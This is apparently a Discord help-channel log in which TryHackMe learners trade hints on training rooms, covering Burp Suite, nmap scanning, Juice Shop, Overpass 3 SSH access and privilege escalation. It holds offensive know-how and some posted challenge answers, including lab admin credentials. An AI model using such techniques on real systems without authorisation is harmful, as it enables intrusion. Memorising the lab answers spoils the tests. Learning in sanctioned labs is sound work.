@teal osprey When you used gobuster, did you only look for directories? or also files as well πŸ˜‰

teal osprey
#

hmmm... thanks let me try πŸ™‚

#

aghhh -- feel so stupid. Thanks for the help lassi and unlooki

mighty iron
#

np, gl finishing the ctf

long totem
#

I'm stuck when dealing with instruction "We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header. "

#

When i send a response with a Set-Cookie header in Burp Sequencer

#

And i analyse entropy after 10.000 requests, I only have an entropy of ~80

#

This question "
Parse through the results. What is the effective estimated entropy measured in?" expects an entropy between 1000 and 9999

#

Can anyone helps me pls πŸ˜‰ ?

mighty iron
#

I think I also had that bug a while back, I'm not sure what I did, but I think restarting burp solved it for me

full arch
long totem
#

It's weird because only requests sent to path socket.io give me result with Set-Cookie header

#

All other Path of Juice Shop doesn't give me this header

iron wigeon
long totem
long totem
iron wigeon
#

For easy to know, can you send screenshot?

long totem
#

There is the pop-up

iron wigeon
#

Burpsuite Basic or Owasp juiceshop rooms?

long totem
iron wigeon
long totem
long totem
iron wigeon
#

Hey what is the question?

iron wigeon
#

If i remember where it's in 35+?

#

...

long totem
#

It wants to have a response with the "Set-Cookies" header in

#

Pass this request in Sequencer to estimate the entropy of it

#

When i pass all requests that have this header in Sequencer, i have entropy like ~80

#

But the question expects an entropy with 4 number (example: 5236)

iron wigeon
#

If you read clearly

#

You can see it? Password reset tokens (sent with password resets that in theory uniquely tie users with their password reset requests)

#

And the second question is We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header.

#

So you need to find it

long totem
left thunder
long totem
#

I'm so fucking dumb

#

Thanks a lot @left thunder ! and sorry @iron wigeon for wasting your time pepehands

green minnowBOT
#

Gave +1 Rep to @left thunder

green minnowBOT
#

Gave +1 Rep to @left thunder

sharp bloom
#

Hey guys I am stuck on the 4th question of task 5 in pyramid of pain. It seems like a copy of the third question, anyone have a hint?

grim flame
#

hey can anyone help me with burp suite: the basics task 13

#

my machine ip wont show up in the scope part

sharp bloom
grim flame
#

task 13

#

i can get it to forward and drop things

#

but when i move to the scope part

#

it doesnt work at all

#

ive been stuck for 2 days now

alpine kestrel
grim flame
#

sure

#

one second

#

what

#

it wont let me paste

alpine kestrel
#

!docs verify

proud scarabBOT
alpine kestrel
#

@grim flame ⬆️ follow the above to send images here

grim flame
#

oh thank you

alpine kestrel
#

did you click the open browser button in burp on the attackbox????

#

because if yes yeah that will not work that well as it is running as root and not a normal user

#

use firefox with foxyproxy instead

grim flame
#

thats without it

#

sorry

#

i get the request in my proxy intercept

#

i forward it

#

and it gets me there

#

so when i go to scope

#

to look for my machine ip

#

its not there

alpine kestrel
# grim flame

oooh after checking it again... wrong ip.... you are using the attackbox ip when you should be using the target machine ip

grim flame
#

whats that?

alpine kestrel
#

there should be a start machine button that is green in one of the tasks

#

click that

grim flame
#

omg

alpine kestrel
#

then later in the text the MACHINE_IP will change to a ip you are supposed to connect to

grim flame
#

i just figured machine ip was my attack box ip

#

because i stopped the task and came back to it

#

so i guess i forgot about the green box

alpine kestrel
#

well this will help you in the future then

#

learning from your mistakes

grim flame
#

so this is the ip correct?

alpine kestrel
#

yuup it is

grim flame
#

wow thank you

#

good lesson

#

❀️

alpine kestrel
#

no problem

grim flame
#

i shall boost this server in your honor

alpine kestrel
#

or do a +rep @shadow_absorber#1234 @grim flame

#

to award a virtual internet point

grim flame
#

+rep @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

that gives good feelings

grim flame
#

there

#

good vibes all around thank you so much

#

were using this in our cyber security class and this room has been frustrating me for 2 days

#

my teacher told me to come to the discord

#

hes a cool guy

alpine kestrel
#

yeah definitely if he is teaching kids a great gamified hacking training platform

grim flame
#

ok

#

im still having trouble finding this flag

#

i now have it in my scope

#

but i cant find the flag

alpine kestrel
# grim flame

well have the proxy on and let it get the results but turn of intercept if it annoys you.... then go to the ip website in your browser and click around all the links

#

after that check back in burp and there should be one which is random alphanumeric chars that is the one you want to view

grim flame
#

OMG

#

YAY!

#

APOWTRUJOAUEJTOUAE

#

thank you so much

#

i clicked the submit a ticket link

#

then a random page popped up in scope

#

checked response

#

and there it was

#

THANK YOU!

alpine kestrel
#

GG

#

you just learnt a bit about how to check through a website and walking those

grim flame
#

yeah seriously

#

i learned so much from this one task

#

wow

#

is there anyway to copy from the attack box to tryhackme

#

or i just gotta type it in

alpine kestrel
#

mark text as copy then this

grim flame
#

youre the best thank you so much

alpine kestrel
#

that box lets you get text too and from the attackbox

grim flame
#

+rep @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

#

like helping others learn

grim flame
#

thank you!

brave ermine
#

Confetti!

proven pier
#

@stuck fractal hello you said to text you if i needed help im at the OWASP juice shop "task 4 who broke my lock" i got the password for the admin but it dosent get me the flag this is what i got [admin@juice-sh.op:admin123]

white salmon
#

nmap option to scan all ports

#

thought it would be using a wildcard

#

so -p "*"

#

but i guess thats wrong

iron wigeon
#

But this is scan all port thus will be take a long time

white salmon
green minnowBOT
#

Gave +1 Rep to @iron wigeon

stuck fractal
proven pier
teal osprey
#

hi folks. looking for any hints on the first flag of Overpass. I see the login page, trying to find if there's a way to sql inject it, but having no luck so far... any other owasp top 10 i should be looking at?

teal osprey
#

nevermind, got it!

sharp hill
#

Folks I have a question regarding the Red Team Firewall Evasion Room, What is the maximum size of the IP packet when running Nmap with --data-length 128 option?

#

I am not sure how to calculate the maximum size, I guess I am just confused and not following here

#

omggg nevermind

#

I just figured it out lol

#

I didn't realize that the header size was different, because I was expecting the TCP header size of 24 bytes. Then I was confused and making this way to complex. Ran the pcap capture myself and checked the header size...

lime wyvern
#

I need help with a room but I cant send pictures

left thunder
#

!docs verify

proud scarabBOT
teal osprey
#

Is it ever possible or necessary to switch to the tryhackme user?

left thunder
teal osprey
#

basically there's a tryhackme user on machines i've done (currently doing overpass for example)

#

i see that that's not the exploit path in overpass, but I'm curious is the path is ever to switch to the tryhackme user

left thunder
teal osprey
#

anyone available to help on overpass3?

languid tinsel
#

anyone help me out

#

its showing machine will start with in few minutes but morethan a hr its not came

#

im waiting it to start but nothing happend

left thunder
languid tinsel
left thunder
languid tinsel
#

yeah

#

i can see that

#

but its not opening

left thunder
#

Unlike linux fundamentals 1, this target machine is not starting within the browser, you have to ssh into it

languid tinsel
#

ok will try , thanks for the response

orchid charm
#

like are you supposed to be able to type in it

#

I was typing in it to see if it did anything

rain stag
orchid charm
#

ok

#

I feel like the reason its not working

#

is because I used Linux funds 1 thing and ssh'ed it into linux funds 3 machine

#

instead of using attackbox

#

because I don't have any time left

#

ok

#

so... what I am exactly supposed to do?

#

its to connect to the python http.server but it doesn't work

#

oh ok

junior wave
#

How was I supposed to know user pass for Alfred room was ||admin:admin||? Is there a way to find out or is it just gung ho let's guess these before we go to burp and hydra

lime violet
white salmon
white salmon
green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
white salmon
manic depot
#

Hi All. I'm currently in the CC: Pen Testing room. A couple of the tasks are triggering my firewall. I tried adding a new 'allow' rule for the IP and moved it to the top, but no success. Any hints?

midnight rivet
#

Hi guys,
I'm stuck with privilege escalation
I got access to the shell, with normal user (apache), I need tips how can I do privilege escalation to get access to root shell
I'm beginner and I need tips to improve my skills,

I don't wanna to read the writeups about the machine I just need tips!

I GOOGLED A LOT BUT WITHOUT RESULT

bash-3.00$ id   
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ whoami
whoami
apache
bash-3.00$ 
#

what does that mean ?

#

there are two users in the machine john and harold

real steppe
#

Hi all
I was trying advent of code 2019... Day8
I was trying "sudo nmap -p- ipAddress" but it's taking to much time to execute and getting stuck around 24%

midnight rivet
#

I can't read /etc/shadow

#

exactly

#

then how can i get access to another users

#

I have just one cronjob it's

root      4723  0.0  0.6  5568  780 pts/1    S+   04:15   0:00 crontab
real steppe
green minnowBOT
#

Gave +1 Rep to @real steppe

midnight rivet
#
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
#

what can I do with them ?

#

yes it's

#

Thank you

real steppe
#

ok ok will do @burnt rivet

#

thanks @burnt rivet . I was able to proceed.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

manic depot
#

Thanks lassi.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

manic depot
#

I added the mask to the allow rule to no effect. 😞 I then added my OpenVPN IP to the rule, again to no effect. Below is the security notification from my firewall. The attackerIP matches the THM VM IP (as expected) and the IP for My Device matches the IP for a wireguard tunnel on my machine. I should add that I'm on a win10 machine running kali in a VBox. Thanks again..

green minnowBOT
#

Gave +1 Rep to @burnt rivet

manic depot
#

OOPS!! Forgot to paste the notification. πŸ˜– If it helps at all?
Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
2/21/2022 10:53:25,High,An intrusion attempt by 10.10.56.153 was blocked.,Blocked,No Action Required,Attack: Malicious Scan Request 6,No Action Required,No Action Required,"10.10.56.153, 80",http://10.10.56.153/,"< My Device > (10.18.19.207, 1320)",10.10.56.153,"TCP, www-http"

#

thanks.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

junior wave
#

Hi, I'm doing the wonderland room. I've followed the rabbit and arrived at the door, but I can't seem to figure out how to open the door and enter wonderland

junior wave
#

Omg, I just found it

#

That's so sneaky lmao

white salmon
#

Wonderland is a good room.

junior wave
onyx basalt
#

if you don't know privesc it'll be hard to finish

#

i didn't know either got stuck there too lol

junior wave
long frost
#

Hi, guys. I need your help for Simple CTF Room.
I'm facing UnicodeDecodeError when do python script downloaded from exploit-db web site.
Could you give a hint to solve this error??skidy
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 923: invalid continuation byte

onyx basalt
#

See if this can help

long frost
green minnowBOT
#

Gave +1 Rep to @onyx basalt

onyx basalt
green minnowBOT
#

Gave +1 Rep to @onyx basalt

onyx basalt
#

Np

junior wave
simple trench
#

Hey guys
I'm new to both discord & infosec.. I'm also a subscriber of thm.. I've been trying to solve the buffer overflow room "Brainstorm"..I have a doubt regarding that.. can you help me plz

long frost
green minnowBOT
#

Gave +1 Rep to @junior wave

willow flower
#

hey I'm having a problem with this question in room Red Team Engagements on task 3:

What is the first access type mentioned in the document?

little tree
#

To whom did you escalate the event associated with the malicious IP address?

#

I am doing Jr Security Analyst Intro

#

I think the answer should be staff members

#

but the answer pattern given is ^^^^ ^^^^^^^

#

I got the answer

long frost
#

@onyx basalt @junior wave
For about the python script for Simple CTF Room, I could run the script!! Thank you so much!
What I did is downloading the script from Exploit-db web site, and convert the script to python2 to 3 format by using 2to3, and also, the script use ASCII dictionary, so I've converted rockyou.txt to ASCII, at last in the script the text of dictionary need to convert to utf-8 before hashing ( I added encode('utf-8') into the script. Finally the script ran with no errors!
Thanks for your help!!

green minnowBOT
#

Gave +1 Rep to @onyx basalt

#

Gave +1 Rep to @junior wave

ornate vale
#

Hey, do we have any room on manual smtp enum..

lone jackal
plush girder
#

guys i'm on nmap switches under networking, and there's this question. how would you activate all the scripts in the vuln category, i've tried everything and it says the answer is not correct

#

--script=vuln

empty pecan
#

it is nearly it. I had to look it up in the man page tbh because it looked correct to me at first

#

interesting, nmap --script=vuln works. strange that the answer is wrong

#

I would have thought|| --script vuln|| would be correct as well

plush girder
#

couldn't find anything useful in the -h and man

empty pecan
#

whats the exact room?

plush girder
#

futhernmap

left thunder
plush girder
#

the answer is incorrect

empty pecan
#

hmm, strange, because for me it was correct

left thunder
plush girder
#

yes

#

i've been on it for almost a week, i asked because i was fed up

left thunder
# plush girder yes

Okay, but to make it sure, with ctrl + F5? Not just a regular page refresh, or manually cleared cache ?

#

Also, maybe provide a screenshot of your answer, you will have to verify for that first

#

!docs verify

proud scarabBOT
plush girder
#

one moment

clever seal
#

I am in the sqlmap map room and have downloaded sqlmap from github. I added sqlmap.py to /usr/local/bin, but when I run sqlmap.py outside of my /TOOLS directory, I receive [!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details. Am I supposed to copy everything from sql-master/ into /usr/local/bin? Should I have just unzipped everything into /usr/local/bin?

sand sequoia
#

couple of rooms asked to scan for all ports with nmap, but they're taking literally forever, and puts a real damper on my momentum (and precious time). is there no way to make scanning all ports faster?

green minnowBOT
#

Gave +1 Rep to @burnt rivet

left thunder
#

But basically adding -T4 or even -T4 --min-rate 10000 should speed things up and should be no issue for THM machines

sand sequoia
#

which means every time a question asks to scan for all ports, i have to wait for at least 30 minutes?

left thunder
#

But try adding the min-rate too, this has been working best for many people

sand sequoia
green minnowBOT
#

Gave +1 Rep to @left thunder

umbral umbra
#

Running additional scripts and checks can slow down your nmap; my VPN upstream to the THM network is typically very slow, not unusual for a full port scan to take 15+ minutes; doing it from the attackbox is much faster in that situation

midnight rivet
#

Hello
can I exploit this script for **privilege escalation **

$ ls -la
-rwxr-xrwx 1 root root 38 /home/user/script.sh

Any hints ?

midnight rivet
#

any update πŸ™‚ ?

clever seal
#

In https://tryhackme.com/room/sqlmap Task 2 runs an example command sqlmap -u https://testsite.com/page.php?id=7 --dbs and says "Here we have used two flags: -u to state the vulnerable URL and --dbs to enumerate the database.". My question is probably silly, but how am I supposed to know that the URL is even vulnerable?

wooden jetty
#

most common size is 472 from my previous results, when i added -fs 472, no subdomains popped up

tranquil parcel
wooden jetty
#

ohhhhh

#

i think thats why then

#

thank you!

#

i started that room yesterday and then went to sleep haha.

green minnowBOT
#

Gave +1 Rep to @tranquil parcel

wooden jetty
#

am i supposed to give rep every help?

#

ahh got it.

#

yeah, i was wondering if i should still give since you gave him one haha.

tranquil parcel
#

btw i'm not him, but thanks

#

It's nice to get the rep from thank you replies even though they are just useless internet points

wooden jetty
#

Yep! I got the two flags. Thanks again!

karmic timber
#

What to do when having network issues with target machine

white salmon
#

What problems are you experiencing?

karmic timber
#

smbclient //10.10.10.2/secret -U suit -p 445

#

no password

#

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\suit's password:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

#

But it will not allow me to enter

#

I tried using my machine target IP address in place of the exercise IP

#

This isnt the first time Ive had this issue, Im sure there must be something Im not seeing here

white salmon
#

Which room is that?

#

Network services or is it host discovery?

karmic timber
#

Network Services

#

I think I just figure it out I have to change secret to profiles

white salmon
#

Hhmm, your answer is right.

karmic timber
#

yeah I wasnt comprehending the instructions

#

I overthink

white salmon
#

Ah, good.

karmic timber
#

thanks

potent ember
#

hi frends

white salmon
#

πŸ‘‹

autumn ferry
#

What is the intended way to buffer-overflow an exe when you're running on kali? Is there a windows VM somewhere available in THM to run immunity debugger? Or am I supposed to use wine? Even walkthroughs just vaguely say "use a windows machine". But I do not have a windows machine.

white salmon
#

Which room are you doing?

autumn ferry
#

Brainstorm

white salmon
#

Are you doing it on the attackbox>

#

?*

autumn ferry
#

Nope, I just use my own kali vm

#

But it runs on mac, so no windows πŸ˜›

cedar anvil
#

Also, brainstorm is a somewhat advanced room

#

Wouldn't recommend it if you're just starting recently

autumn ferry
#

I'll give wine a go then πŸ™‚ and thanks for the heads up, if I have trouble with it I'll try a different one πŸ˜„

#

Just a bit weird, that no where on THM I can find info on doing exe buffer overflows on a non-windows machine. Seems like everyone assumes you have a spare windows PC lying around or something.

cedar anvil
#

If you want an easy workaround, you can use the "blue" room on thm,

autumn ferry
#

Can I load multiple room machines at once tho?

cedar anvil
#

But you'll have to install immunity debugger and transfer files which would be difficult

cedar anvil
autumn ferry
#

Ah nice.

#

Well I just came from the buffer overflow prep room. I might try using that one then since it ran windows.

#

And has immunity debugger.

#

Unfortunately does not seem to work. When I run the exe from brainstorm on the windows VM from either blue or the prep room it just crashes on startup. Likely because the exe is 32 bit and the rooms are 64 bit.

cedar anvil
autumn ferry
#

Yes I did that and it doesn't seem to run healthily

#

It warns at the start that it is not a 32-bit portable executable. I load it in anyway. Run it, I get an exception in immunity debugger. And when I try to connect via telnet or nc to the port it should be running on I get connection refused.

cedar anvil
#

Well, the simplest method is to spun up a local Windows 7 vm, otherwise you can install immunity debugger in Blue room vm,
Side note: blue vm works I've tried it

autumn ferry
#

Well I haven't spun up a windows vm in years so hopefully it doesn't take ages or eat tonnes of storage.

clear hill
#

Hi everyone. Has anyone done the Overpass 3 room? I'm having trouble with ||SSHing as the James user.||

dry gate
#

It'll make it easier for people to understand and help :)

clear hill
#

Sure. I've tunneled ports 111, 2049, and 20048 through SSH and mounted the NFS share. I've tried adding the SSH key I generated for the paradox user to the authorized_keys file but I am still being asked for a password.

#

for the james user

stuck fractal
clear hill
#

Yes

#

I tried copying it over and using it but I still get asked for a password

#

I'm going through all the steps again (I let my machine time out)

stuck fractal
clear hill
#

yes

#

I'm not sure why it's failing

stuck fractal
#

If you enter an incorrect password three times, can you screenshot the error message?

clear hill
#

sure

#

I'm almost to that spot again

stuck fractal
#

I've got an attackbox up and I have both the passwords for each user and hopefully the SSH keys in my notes

clear hill
#

I am VPN'd in fwiw

#

OMG I feel kinda dumb. I got it to work by chowning the id_rsa file

stuck fractal
#

Huh, did it not print a big banner warning when you tried to use it?

clear hill
#

nope

stuck fractal
#

Now that's strange

clear hill
#

just a tiny "permission denied"

stuck fractal
#

Should do that if the perms on your ssh key that you're trying to use are wrong

clear hill
#

I think you get the big banner if it's not chmod 600

stuck fractal
#

It has to be not readable by other users on the system, any perms that are too open including owner/group I hope

clear hill
#

that's what I was getting for errors before chowning it to my user

#

Am I talking to THE James of Overpass?